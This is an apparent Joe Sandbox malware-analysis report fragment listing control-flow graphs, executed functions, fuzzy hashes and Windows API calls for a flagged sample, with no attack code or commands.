37578 133d4be GetCurrentProcess 37577->37578 37580 133d510 GetCurrentThread 37578->37580 37582 133d509 37578->37582 37581 133d54d GetCurrentProcess 37580->37581 37583 133d546 37580->37583 37586 133d583 37581->37586 37582->37580 37583->37581 37584 133d5ab GetCurrentThreadId 37585 133d5dc 37584->37585 37586->37584 37587 133b0f8 37591 133b1e1 37587->37591 37599 133b1f0 37587->37599 37588 133b107 37592 133b201 37591->37592 37593 133b224 37591->37593 37592->37593 37607 133b478 37592->37607 37611 133b488 37592->37611 37593->37588 37594 133b21c 37594->37593 37595 133b428 GetModuleHandleW 37594->37595 37596 133b455 37595->37596 37596->37588 37600 133b201 37599->37600 37601 133b224 37599->37601 37600->37601 37605 133b478 LoadLibraryExW 37600->37605 37606 133b488 LoadLibraryExW 37600->37606 37601->37588 37602 133b21c 37602->37601 37603 133b428 GetModuleHandleW 37602->37603 37604 133b455 37603->37604 37604->37588 37605->37602 37606->37602 37608 133b488 37607->37608 37610 133b4c1 37608->37610 37615 133ac20 37608->37615 37610->37594 37612 133b49c 37611->37612 37613 133b4c1 37612->37613 37614 133ac20 LoadLibraryExW 37612->37614 37613->37594 37614->37613 37616 133b668 LoadLibraryExW 37615->37616 37618 133b6e1 37616->37618 37618->37610 37698 7f50408 37699 7f598e0 PostMessageW 37698->37699 37700 7f5994c 37699->37700

                                    Executed Functions

                                    Function 085C0040 Relevance: 16.2, Strings: 12, Instructions: 1190COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (_]q$(_]q$,aq$4c]q$4c]q$Haq$Nv\q$$]q$$]q$$]q$c]q$c]q
                                    • API String ID: 0-67377238
                                    • Opcode ID: 6a7f27795eb16b09a6770e0ff293eeaa6f94a24d15712cdc0deb4ccdc961f80b
                                    • Instruction ID: e2bad9f56821091a91fdb2b096bcb6b6d4dd8434fd666901907a6d353487d0a2
                                    • Opcode Fuzzy Hash: 6a7f27795eb16b09a6770e0ff293eeaa6f94a24d15712cdc0deb4ccdc961f80b
                                    • Instruction Fuzzy Hash: 13829460B80525CFCB59EFBD885062D66E7BFCCB01B60496DD04ADB394EE64CC458FA2
                                    Function 085C4270 Relevance: 15.1, Strings: 10, Instructions: 2597COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (o]q$4']q$4']q$4']q$4']q$4']q$4']q$4|bq$4|bq$$]q
                                    • API String ID: 0-3618750947
                                    • Opcode ID: 2384e5b7de873d5a33f7ad886fc96eb8bec68316f70bca89c39edabc7b50a957
                                    • Instruction ID: 2eddc4a75e2f4af32aee3759115235d454e27fccd6a5cb9803e5e0e28b367b79
                                    • Opcode Fuzzy Hash: 2384e5b7de873d5a33f7ad886fc96eb8bec68316f70bca89c39edabc7b50a957
                                    • Instruction Fuzzy Hash: 9F43D974A00219CFCB24DFA8C998A9DBBB2FF89311F158599D409AB361DB34ED81CF51
                                    Function 085C7850 Relevance: 13.0, Strings: 10, Instructions: 520COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-3613213995
                                    • Opcode ID: e7fe003e8c7261b8bc0633636438667362112dc50e0ba333449ae8365e8e1e5d
                                    • Instruction ID: 4a0ea375784e16029f9f4a54844dd4fcae429b8a8be70a73f7195f27fa56004e
                                    • Opcode Fuzzy Hash: e7fe003e8c7261b8bc0633636438667362112dc50e0ba333449ae8365e8e1e5d
                                    • Instruction Fuzzy Hash: 7112D031B442498FDB048BBCD8597AD7FA2BB8D712F24885DE901ABB85DA348C41CF95
                                    Function 085C3280 Relevance: 7.1, Strings: 5, Instructions: 823COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (o]q$(o]q$,aq$,aq$Haq
                                    • API String ID: 0-2157538030
                                    • Opcode ID: 1acbe9be502ee62f08061cc96ba02d6fed6bb505b1ded519fb09d078041902c1
                                    • Instruction ID: ae893116ac5b68e6a7708e34b329228153e5df64a69c17c26fb44f78e0d30de9
                                    • Opcode Fuzzy Hash: 1acbe9be502ee62f08061cc96ba02d6fed6bb505b1ded519fb09d078041902c1
                                    • Instruction Fuzzy Hash: B0625E35A00119DFCB04DFA9D984AAEBBB2BF88711B15C56DE8059B364DB35EC42CF90
                                    Function 085C9DCF Relevance: 4.1, Strings: 3, Instructions: 301COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2764 85c9dcf-85c9dd0 2765 85c9d72-85c9d75 2764->2765 2766 85c9d7e-85c9d90 2765->2766 2767 85c9d77 2765->2767 2766->2765 2767->2766 2768 85c9e0d-85c9e14 2767->2768 2769 85c9e3e-85c9e40 2767->2769 2770 85c9d98 2767->2770 2771 85c9dc9 2767->2771 2772 85c9dcb 2767->2772 2773 85c9e66-85c9e68 2767->2773 2774 85c9df7-85c9e08 2767->2774 2775 85c9d92-85c9d96 2767->2775 2776 85c9dd2-85c9de5 2767->2776 2779 85c9e1b-85c9e1d 2768->2779 2780 85c9e16-85c9e1a 2768->2780 2777 85c9e5a-85c9e63 2769->2777 2778 85c9e42-85c9e48 2769->2778 2770->2771 2771->2772 2772->2764 2773->2765 2774->2765 2775->2765 2788 85c9e6d-85c9ee2 2776->2788 2789 85c9deb-85c9df2 2776->2789 2782 85c9e4c-85c9e58 2778->2782 2783 85c9e4a 2778->2783 2785 85c9e1f-85c9e29 2779->2785 2786 85c9e3a-85c9e3c 2779->2786 2780->2779 2782->2777 2783->2777 2785->2788 2790 85c9e2b-85c9e32 2785->2790 2787 85c9e35 2786->2787 2787->2765 2793 85c9f04-85c9f10 2788->2793 2789->2765 2790->2787 2794 85c9ff5-85ca065 2793->2794 2795 85c9f16-85c9f22 2793->2795 2800 85ca087-85ca08c 2794->2800 2796 85c9ee4-85c9ee7 2795->2796 2797 85c9ee9 2796->2797 2798 85c9ef0-85c9f02 2796->2798 2797->2793 2797->2798 2801 85c9f4e-85c9f53 2797->2801 2802 85c9f8f-85c9fa2 2797->2802 2803 85c9f88 2797->2803 2804 85c9fdb-85c9fe2 2797->2804 2805 85c9f24-85c9f32 2797->2805 2806 85c9f55-85c9f5b 2797->2806 2807 85c9f80-85c9f81 2797->2807 2808 85c9fb3-85c9fb5 2797->2808 2798->2796 2816 85ca067-85ca06a 2800->2816 2801->2796 2810 85c9fac-85c9fb1 2802->2810 2811 85c9fa4 2802->2811 2803->2802 2804->2794 2817 85c9fe4-85c9ff0 2804->2817 2812 85c9f3b-85c9f3f 2805->2812 2813 85c9f34 2805->2813 2825 85c9f63-85c9f6c 2806->2825 2807->2803 2814 85c9fcf-85c9fd8 2808->2814 2815 85c9fb7-85c9fbd 2808->2815 2820 85c9fa7 2810->2820 2811->2820 2812->2794 2824 85c9f45-85c9f4c 2812->2824 2821 85c9f39 2813->2821 2822 85c9fbf 2815->2822 2823 85c9fc1-85c9fcd 2815->2823 2818 85ca06c 2816->2818 2819 85ca073-85ca085 2816->2819 2817->2796 2818->2800 2818->2819 2826 85ca08e-85ca09d 2818->2826 2827 85ca0ee-85ca0f3 2818->2827 2828 85ca10e-85ca113 2818->2828 2829 85ca0f8-85ca10b 2818->2829 2830 85ca0aa-85ca0be 2818->2830 2831 85ca0c0-85ca0e1 2818->2831 2832 85ca0e3-85ca0e9 2818->2832 2819->2816 2820->2796 2821->2796 2822->2814 2823->2814 2824->2821 2825->2794 2833 85c9f72-85c9f7b 2825->2833 2835 85ca09f 2826->2835 2836 85ca0a6-85ca0a8 2826->2836 2827->2816 2828->2816 2830->2816 2831->2816 2832->2816 2833->2796 2840 85ca0a4 2835->2840 2836->2840 2840->2816
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: l.]q$l.]q$r
                                    • API String ID: 0-1833449037
                                    • Opcode ID: f7bdc583efabda5aa55d405eb6ae2259f75eb89d3420eae9d65f600885f59e79
                                    • Instruction ID: 3fc743c36d99aebd5bede70486e8e7825ee4f442424b7f17cd7f0928e36a0044
                                    • Opcode Fuzzy Hash: f7bdc583efabda5aa55d405eb6ae2259f75eb89d3420eae9d65f600885f59e79
                                    • Instruction Fuzzy Hash: 94B1F175904294CFC7018FADD8406A9FFF1BF46322F1489AFE456EB692C634C990CB52
                                    Function 085C89B4 Relevance: 30.6, Strings: 24, Instructions: 598COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fbq$ fbq$ fbq$ fbq$ fbq$ fbq$ fbq$ fbq$ fbq$Te]q$Te]q$Te]q$XX]q$XX]q$XX]q$XX]q$XX]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-3260208676
                                    • Opcode ID: fe1f5e8df4e2ba2be1afbc4df91b2562c125d6072cb199b32d4df92a344f1206
                                    • Instruction ID: 8644b215405a67f75e75b8c85bf0b6f8622ecba167edd78dc572b7d622927aa2
                                    • Opcode Fuzzy Hash: fe1f5e8df4e2ba2be1afbc4df91b2562c125d6072cb199b32d4df92a344f1206
                                    • Instruction Fuzzy Hash: 01328234A00258CFDB14DFE9C895AAD7BB2BF44352F24496ED842AB395CB709C46CF51
                                    Function 085C7840 Relevance: 10.4, Strings: 8, Instructions: 355COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q
                                    • API String ID: 0-2016595432
                                    • Opcode ID: a10f28dbc813a654cf10e2008085ecfc1db002601c39aa185373a6fa033c4783
                                    • Instruction ID: 04095f1affe09472a677889a13531ece9f938e156d35db9d672fe0b06bfc5c72
                                    • Opcode Fuzzy Hash: a10f28dbc813a654cf10e2008085ecfc1db002601c39aa185373a6fa033c4783
                                    • Instruction Fuzzy Hash: 18D19034B40205DFDB049FACD859BAD7BA2BB8C711F20842DE906AB784DE749C42CF95
                                    Function 085C8DEA Relevance: 10.2, Strings: 8, Instructions: 230COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2097 85c8dea-85c8dee 2098 85c8e06-85c8e23 2097->2098 2099 85c8df0-85c8df6 2097->2099 2103 85c8e25-85c8e2e 2098->2103 2104 85c8e46 2098->2104 2100 85c8df8 2099->2100 2101 85c8dfa-85c8dfc 2099->2101 2100->2098 2101->2098 2105 85c8e35-85c8e42 2103->2105 2106 85c8e30-85c8e33 2103->2106 2107 85c8e49-85c8e70 2104->2107 2108 85c8e44 2105->2108 2106->2108 2207 85c8e72 call 85c9dcf 2107->2207 2208 85c8e72 call 85c9ea9 2107->2208 2108->2107 2111 85c8e78-85c8e82 2112 85c8e88-85c8e8f 2111->2112 2113 85c9179-85c9211 2111->2113 2114 85c8dca-85c8dcd 2112->2114 2115 85c8ddf-85c8dee 2114->2115 2116 85c8dcf 2114->2116 2115->2098 2115->2099 2116->2115 2118 85c916d-85c9176 2116->2118 2119 85c8fef-85c8ff9 2116->2119 2120 85c8f19-85c8f3d 2116->2120 2121 85c90cb-85c90cf 2116->2121 2122 85c8f6b-85c8f7e 2116->2122 2123 85c904b-85c904d 2116->2123 2124 85c8e94-85c8ea7 2116->2124 2125 85c9156-85c916a 2116->2125 2126 85c8f40-85c8f4f 2116->2126 2127 85c9010-85c9023 2116->2127 2128 85c9052-85c9056 2116->2128 2119->2113 2133 85c8fff-85c900b 2119->2133 2120->2126 2131 85c90d1-85c90da 2121->2131 2132 85c90f2 2121->2132 2122->2113 2149 85c8f84-85c8f99 2122->2149 2123->2114 2151 85c8ea9-85c8eb2 2124->2151 2152 85c8eca 2124->2152 2126->2113 2134 85c8f55-85c8f5e 2126->2134 2156 85c9044-85c9049 2127->2156 2157 85c9025-85c902f 2127->2157 2129 85c9058-85c9061 2128->2129 2130 85c9079 2128->2130 2137 85c9068-85c9075 2129->2137 2138 85c9063-85c9066 2129->2138 2142 85c907c-85c9083 2130->2142 2139 85c90dc-85c90df 2131->2139 2140 85c90e1-85c90ee 2131->2140 2145 85c90f5-85c90f9 2132->2145 2133->2114 2147 85c8f60 2134->2147 2148 85c8f63-85c8f66 2134->2148 2150 85c9077 2137->2150 2138->2150 2155 85c90f0 2139->2155 2140->2155 2153 85c9099 2142->2153 2154 85c9085-85c9097 2142->2154 2158 85c911a 2145->2158 2159 85c90fb-85c9104 2145->2159 2147->2148 2178 85c8f9b-85c8fa1 2149->2178 2179 85c8fb7 2149->2179 2150->2142 2162 85c8eb9-85c8ec6 2151->2162 2163 85c8eb4-85c8eb7 2151->2163 2165 85c8ecd-85c8ed1 2152->2165 2164 85c909c-85c90a9 2153->2164 2154->2164 2155->2145 2171 85c903f 2156->2171 2157->2113 2168 85c9035-85c903c 2157->2168 2160 85c911d-85c912b 2158->2160 2169 85c910b-85c910e 2159->2169 2170 85c9106-85c9109 2159->2170 2185 85c912d-85c9134 2160->2185 2186 85c9142-85c9149 2160->2186 2173 85c8ec8 2162->2173 2163->2173 2190 85c90ab-85c90b1 2164->2190 2191 85c90c1-85c90c6 2164->2191 2174 85c8ef2 2165->2174 2175 85c8ed3-85c8edc 2165->2175 2168->2171 2176 85c9118 2169->2176 2170->2176 2171->2114 2173->2165 2184 85c8ef5-85c8f14 2174->2184 2182 85c8ede-85c8ee1 2175->2182 2183 85c8ee3-85c8ee6 2175->2183 2176->2160 2187 85c8fa7-85c8fb3 2178->2187 2188 85c8fa3-85c8fa5 2178->2188 2189 85c8fb9-85c8fbb 2179->2189 2192 85c8ef0 2182->2192 2183->2192 2184->2114 2185->2113 2193 85c9136-85c913a 2185->2193 2186->2113 2195 85c914b-85c9154 2186->2195 2194 85c8fb5 2187->2194 2188->2194 2196 85c8fbd-85c8fc3 2189->2196 2197 85c8fd5-85c8fea 2189->2197 2198 85c90b5-85c90b7 2190->2198 2199 85c90b3 2190->2199 2191->2114 2192->2184 2201 85c913d 2193->2201 2194->2189 2195->2201 2203 85c8fc5 2196->2203 2204 85c8fc7-85c8fd3 2196->2204 2198->2191 2199->2191 2203->2197 2204->2197 2207->2111 2208->2111
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fbq$ fbq$Te]q$XX]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-1505870616
                                    • Opcode ID: c8116be86c7ac54bcb9a7b4f815593787a128f1a0797bdb966a20338fdafcad6
                                    • Instruction ID: 983f2d351db8d5abb27e13203df3132e4c2f49b8d46480a3605b04d977fe22e9
                                    • Opcode Fuzzy Hash: c8116be86c7ac54bcb9a7b4f815593787a128f1a0797bdb966a20338fdafcad6
                                    • Instruction Fuzzy Hash: 48917F30A04218DFDB158FD8C945ABDBBB2FF45752F1589AEE502AB2A5C7709C42CF41
                                    Function 085C8DC5 Relevance: 10.2, Strings: 8, Instructions: 220COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2209 85c8dc5 2210 85c8dca-85c8dcd 2209->2210 2211 85c8ddf-85c8dee 2210->2211 2212 85c8dcf 2210->2212 2238 85c8e06-85c8e23 2211->2238 2239 85c8df0-85c8df6 2211->2239 2212->2211 2213 85c916d-85c9176 2212->2213 2214 85c8fef-85c8ff9 2212->2214 2215 85c8f19-85c8f3d 2212->2215 2216 85c90cb-85c90cf 2212->2216 2217 85c8f6b-85c8f7e 2212->2217 2218 85c904b-85c904d 2212->2218 2219 85c8e94-85c8ea7 2212->2219 2220 85c9156-85c916a 2212->2220 2221 85c8f40-85c8f4f 2212->2221 2222 85c9010-85c9023 2212->2222 2223 85c9052-85c9056 2212->2223 2228 85c8fff-85c900b 2214->2228 2229 85c9179-85c9211 2214->2229 2215->2221 2226 85c90d1-85c90da 2216->2226 2227 85c90f2 2216->2227 2217->2229 2247 85c8f84-85c8f99 2217->2247 2218->2210 2249 85c8ea9-85c8eb2 2219->2249 2250 85c8eca 2219->2250 2221->2229 2230 85c8f55-85c8f5e 2221->2230 2257 85c9044-85c9049 2222->2257 2258 85c9025-85c902f 2222->2258 2224 85c9058-85c9061 2223->2224 2225 85c9079 2223->2225 2233 85c9068-85c9075 2224->2233 2234 85c9063-85c9066 2224->2234 2236 85c907c-85c9083 2225->2236 2240 85c90dc-85c90df 2226->2240 2241 85c90e1-85c90ee 2226->2241 2244 85c90f5-85c90f9 2227->2244 2228->2210 2245 85c8f60 2230->2245 2246 85c8f63-85c8f66 2230->2246 2248 85c9077 2233->2248 2234->2248 2251 85c9099 2236->2251 2252 85c9085-85c9097 2236->2252 2278 85c8e25-85c8e2e 2238->2278 2279 85c8e46 2238->2279 2254 85c8df8 2239->2254 2255 85c8dfa-85c8dfc 2239->2255 2256 85c90f0 2240->2256 2241->2256 2259 85c911a 2244->2259 2260 85c90fb-85c9104 2244->2260 2245->2246 2282 85c8f9b-85c8fa1 2247->2282 2283 85c8fb7 2247->2283 2248->2236 2263 85c8eb9-85c8ec6 2249->2263 2264 85c8eb4-85c8eb7 2249->2264 2266 85c8ecd-85c8ed1 2250->2266 2265 85c909c-85c90a9 2251->2265 2252->2265 2254->2238 2255->2238 2256->2244 2273 85c903f 2257->2273 2258->2229 2270 85c9035-85c903c 2258->2270 2261 85c911d-85c912b 2259->2261 2271 85c910b-85c910e 2260->2271 2272 85c9106-85c9109 2260->2272 2292 85c912d-85c9134 2261->2292 2293 85c9142-85c9149 2261->2293 2275 85c8ec8 2263->2275 2264->2275 2297 85c90ab-85c90b1 2265->2297 2298 85c90c1-85c90c6 2265->2298 2276 85c8ef2 2266->2276 2277 85c8ed3-85c8edc 2266->2277 2270->2273 2280 85c9118 2271->2280 2272->2280 2273->2210 2275->2266 2288 85c8ef5-85c8f14 2276->2288 2286 85c8ede-85c8ee1 2277->2286 2287 85c8ee3-85c8ee6 2277->2287 2289 85c8e35-85c8e42 2278->2289 2290 85c8e30-85c8e33 2278->2290 2291 85c8e49-85c8e70 2279->2291 2280->2261 2294 85c8fa7-85c8fb3 2282->2294 2295 85c8fa3-85c8fa5 2282->2295 2296 85c8fb9-85c8fbb 2283->2296 2299 85c8ef0 2286->2299 2287->2299 2288->2210 2300 85c8e44 2289->2300 2290->2300 2319 85c8e72 call 85c9dcf 2291->2319 2320 85c8e72 call 85c9ea9 2291->2320 2292->2229 2301 85c9136-85c913a 2292->2301 2293->2229 2303 85c914b-85c9154 2293->2303 2302 85c8fb5 2294->2302 2295->2302 2304 85c8fbd-85c8fc3 2296->2304 2305 85c8fd5-85c8fea 2296->2305 2306 85c90b5-85c90b7 2297->2306 2307 85c90b3 2297->2307 2298->2210 2299->2288 2300->2291 2311 85c913d 2301->2311 2302->2296 2303->2311 2313 85c8fc5 2304->2313 2314 85c8fc7-85c8fd3 2304->2314 2306->2298 2307->2298 2313->2305 2314->2305 2315 85c8e78-85c8e82 2315->2229 2317 85c8e88-85c8e8f 2315->2317 2317->2210 2319->2315 2320->2315
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fbq$ fbq$Te]q$XX]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-1505870616
                                    • Opcode ID: 98adf8583fa2804c96219a0f4f993449de9bb3393588c4aaf074a3e0157e444e
                                    • Instruction ID: bbe99b04c5a529145fb025194ad244bd01d92b937803a71f6e0ed00f768e1510
                                    • Opcode Fuzzy Hash: 98adf8583fa2804c96219a0f4f993449de9bb3393588c4aaf074a3e0157e444e
                                    • Instruction Fuzzy Hash: 3D816030A04218DFDB15CFD8C944A7DBBB2FB44752F1589AEE502AB295C7709C42CF51
                                    Function 085C2C30 Relevance: 7.8, Strings: 6, Instructions: 325COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2321 85c2c30-85c2c5a 2322 85c2c5c 2321->2322 2323 85c2c63-85c2c67 2321->2323 2322->2323 2324 85c2c7e-85c2c99 2323->2324 2325 85c2c69-85c2c6d 2323->2325 2333 85c2c9b 2324->2333 2334 85c2ca4-85c2ca8 2324->2334 2326 85c2f3e-85c2f49 2325->2326 2327 85c2c73-85c2c7b 2325->2327 2332 85c2f50-85c2fb4 2326->2332 2327->2324 2356 85c2fbb-85c301f 2332->2356 2333->2334 2335 85c2caa-85c2cb0 2334->2335 2336 85c2cb3-85c2cd7 2334->2336 2335->2336 2344 85c2cdd-85c2ce2 2336->2344 2345 85c2e72-85c2e84 2336->2345 2425 85c2ce5 call 85c30f8 2344->2425 2426 85c2ce5 call 85c3108 2344->2426 2427 85c2e87 call 85c34e7 2345->2427 2428 85c2e87 call 85c3270 2345->2428 2429 85c2e87 call 85c3280 2345->2429 2346 85c2e8d 2349 85c2f2f-85c2f36 2346->2349 2348 85c2ceb-85c2cef 2348->2332 2350 85c2cf5-85c2cf9 2348->2350 2350->2332 2352 85c2cff-85c2d09 2350->2352 2355 85c2d0f-85c2d13 2352->2355 2352->2356 2355->2345 2357 85c2d19-85c2d1d 2355->2357 2389 85c3026-85c308a 2356->2389 2359 85c2d2c-85c2d30 2357->2359 2360 85c2d1f-85c2d26 2357->2360 2362 85c2d36-85c2d46 2359->2362 2363 85c3091-85c30b3 2359->2363 2360->2345 2360->2359 2370 85c2d48-85c2d4e 2362->2370 2371 85c2d76-85c2d7c 2362->2371 2368 85c30b5-85c30c1 2363->2368 2369 85c30f0 2363->2369 2368->2369 2382 85c30c3-85c30cc 2368->2382 2372 85c30f2-85c30f5 2369->2372 2373 85c2d50 2370->2373 2374 85c2d52-85c2d5e 2370->2374 2375 85c2d7e 2371->2375 2376 85c2d80-85c2d8c 2371->2376 2380 85c2d60-85c2d70 2373->2380 2374->2380 2377 85c2d8e-85c2dac 2375->2377 2376->2377 2377->2345 2387 85c2db2-85c2db4 2377->2387 2380->2371 2380->2389 2382->2369 2393 85c30ce-85c30dc 2382->2393 2390 85c2dcf-85c2dd3 2387->2390 2391 85c2db6-85c2dca 2387->2391 2389->2363 2390->2345 2395 85c2dd9-85c2de3 2390->2395 2391->2349 2393->2369 2401 85c30de-85c30ec 2393->2401 2395->2345 2403 85c2de9-85c2def 2395->2403 2401->2369 2409 85c30ee 2401->2409 2405 85c2f39 2403->2405 2406 85c2df5-85c2df8 2403->2406 2405->2326 2406->2363 2408 85c2dfe-85c2e1b 2406->2408 2414 85c2e1d-85c2e38 2408->2414 2415 85c2e59-85c2e6d 2408->2415 2409->2372 2422 85c2e3a-85c2e3e 2414->2422 2423 85c2e40-85c2e54 2414->2423 2415->2349 2422->2345 2422->2423 2423->2349 2425->2348 2426->2348 2427->2346 2428->2346 2429->2346
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (o]q$(o]q$,aq$,aq$Haq$d8bq
                                    • API String ID: 0-380147655
                                    • Opcode ID: 8da7aeee5606d74192af5add170b9271cec972ea0c4e6a9736ff7510b17a0d34
                                    • Instruction ID: c0b83574e805f19042373fbfeba3d12e5d8db9f3296c786118349e7c704d547e
                                    • Opcode Fuzzy Hash: 8da7aeee5606d74192af5add170b9271cec972ea0c4e6a9736ff7510b17a0d34
                                    • Instruction Fuzzy Hash: 6CC13630B102199FCB14DFA9D958AAE7BB6BF88701F14846DE806E73A5DB34DC41CB91
                                    Function 0133D474 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2697 133d474-133d507 GetCurrentProcess 2701 133d510-133d544 GetCurrentThread 2697->2701 2702 133d509-133d50f 2697->2702 2703 133d546-133d54c 2701->2703 2704 133d54d-133d581 GetCurrentProcess 2701->2704 2702->2701 2703->2704 2706 133d583-133d589 2704->2706 2707 133d58a-133d5a5 call 133d648 2704->2707 2706->2707 2710 133d5ab-133d5da GetCurrentThreadId 2707->2710 2711 133d5e3-133d645 2710->2711 2712 133d5dc-133d5e2 2710->2712 2712->2711
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0133D4F6
                                    • GetCurrentThread.KERNEL32 ref: 0133D533
                                    • GetCurrentProcess.KERNEL32 ref: 0133D570
                                    • GetCurrentThreadId.KERNEL32 ref: 0133D5C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 67655f8b5dafbfb9ee8376fe8380b8634542b063bd45dc36253cd88354b8459a
                                    • Instruction ID: c2f201203f66ca38637acc48ca86d57a3bec40c1d32dfaeb6117126978282b53
                                    • Opcode Fuzzy Hash: 67655f8b5dafbfb9ee8376fe8380b8634542b063bd45dc36253cd88354b8459a
                                    • Instruction Fuzzy Hash: B7513BB0900349CFDB18DFA9D548B9EBBF1FF88314F208459E019AB260D7785948CF66
                                    Function 0133D478 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2720 133d478-133d507 GetCurrentProcess 2724 133d510-133d544 GetCurrentThread 2720->2724 2725 133d509-133d50f 2720->2725 2726 133d546-133d54c 2724->2726 2727 133d54d-133d581 GetCurrentProcess 2724->2727 2725->2724 2726->2727 2729 133d583-133d589 2727->2729 2730 133d58a-133d5a5 call 133d648 2727->2730 2729->2730 2733 133d5ab-133d5da GetCurrentThreadId 2730->2733 2734 133d5e3-133d645 2733->2734 2735 133d5dc-133d5e2 2733->2735 2735->2734
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0133D4F6
                                    • GetCurrentThread.KERNEL32 ref: 0133D533
                                    • GetCurrentProcess.KERNEL32 ref: 0133D570
                                    • GetCurrentThreadId.KERNEL32 ref: 0133D5C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 23b409725a6bea64c6f7339bbff10e5a492c6809403c3c8a2490007cd9c7a847
                                    • Instruction ID: 58017be3837c73d85feb9597dae7c4c501a06e2371d35c1c3f8bd0b756e974e7
                                    • Opcode Fuzzy Hash: 23b409725a6bea64c6f7339bbff10e5a492c6809403c3c8a2490007cd9c7a847
                                    • Instruction Fuzzy Hash: C1512BB0900349CFDB18DFA9D548B9EBBF5FF88314F208459E019AB260D7785948CF66
                                    Function 085C8240 Relevance: 5.1, Strings: 4, Instructions: 75COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
